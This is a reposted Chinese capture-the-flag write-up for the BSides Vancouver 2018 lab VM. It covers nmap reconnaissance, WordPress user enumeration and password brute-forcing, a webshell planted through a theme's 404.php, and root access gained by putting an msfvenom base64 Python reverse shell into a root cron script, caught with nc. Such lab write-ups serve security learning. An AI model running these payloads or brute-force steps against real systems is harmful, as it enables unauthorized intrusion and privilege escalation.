[Write-up]BSides-Vancouver
Posted kali-team
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[Write-up]BSides-Vancouver相关的知识,希望对你有一定的参考价值。
关于
- 下载链接
- 目标:拿到root用户目录下的flag.txt
- 全程无图!
信息收集
- 因为虚拟机网络是设置Host-only,所以是vmnet1这张网卡,IP段为192.168.7.1/24
nmap -T4 192.168.7.1/24 -A
Nmap scan report for 192.168.7.128
Host is up (0.00040s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 17:52 public
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
| 2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_ 256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (2 hosts up) scanned in 16.54 seconds
从上面可以看到服务器开放了21端口,对应的是FTP服务,还是可以匿名访问的。
浏览器服务:ftp://192.168.7.128/public/users.txt.bk
还开放了80端口,robots.txt里有一个
/backup_wordpress
目录很明显式一个WordPress,直接上wpscan扫一下
wpscan --url http://192.168.7.128/backup_wordpress/ --enumerate
[+] WordPress theme in use: twentysixteen - v1.2
[+] Name: twentysixteen - v1.2
| Last updated: 2018-05-17T00:00:00.000Z
| Location: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/
| Readme: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/readme.txt
[!] The version is out of date, the latest version is 1.5
| Style URL: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/style.css
| Referenced style.css: wp-content/themes/twentysixteen/style.css
| Theme Name: Twenty Sixteen
| Theme URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating usernames ...
[+] We identified the following 2 users:
+----+-------+------+
| ID | Login | Name |
+----+-------+------+
| 1 | admin | admi |
| 2 | john | joh |
+----+-------+------+
[!] Default first WordPress username 'admin' is still used
其实很多漏洞都是XSS或其他需要管理员交互的漏洞,所以很难利用。这里收集到的有博客用的主题,管理员的用户名为john,在博客写的也可以看出来。
爆破
wpscan --url http://192.168.7.128/backup_wordpress/ --username john --wordlist dic.txt
得到密码是
enigma
登录改主题的404.php,getshell后发现没有root权限。
获取任务定时计划
cat /etc/crontab
# /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root /usr/local/bin/cleanup
在这可以看到有一个用root权限运行的cleanup的脚本。
先生成反弹shell的payload
kali-team@LTS:~$ sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.7.1 lport=4444 R
[sudo] kali-team 的密码:
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 601 bytes
python -c "exec('aW1wb3J0IHNvY2tldCAgICAgLCAgICAgICAgIHN1YnByb2Nlc3MgICAgICwgICAgICAgICBvcyAgICAgOyAgICAgICBob3N0PSIxOTIuMTY4LjcuMSIgICAgIDsgICAgICAgcG9ydD00NDQ0ICAgICA7ICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgLCAgICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgIDsgICAgICAgcy5jb25uZWN0KChob3N0ICAgICAsICAgICAgICAgcG9ydCkpICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDApICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDEpICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDIpICAgICA7ICAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
- 用nc监听本地的4444端口
nc -lvp 4444
- 把payload复制到cleanup脚本里保存,坐等shell反弹回来
- 获取flag
kali-team@LTS:~$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.7.128] port 4444 [tcp/*] accepted (family 2, sport 51156)
ls
flag.txt
id
uid=0(root) gid=0(root) groups=0(root)
cat flag.txt
Congratulations!
If you can read this, that means you were able to obtain root permissions on this VM.
You should be proud!
There are multiple ways to gain access remotely, as well as for privilege escalation.
Did you find them all?
@abatchy17
write-up录像
CTF-BSides Vancouver: 2018 (Workshop)
以上是关于[Write-up]BSides-Vancouver的主要内容,如果未能解决你的问题,请参考以下文章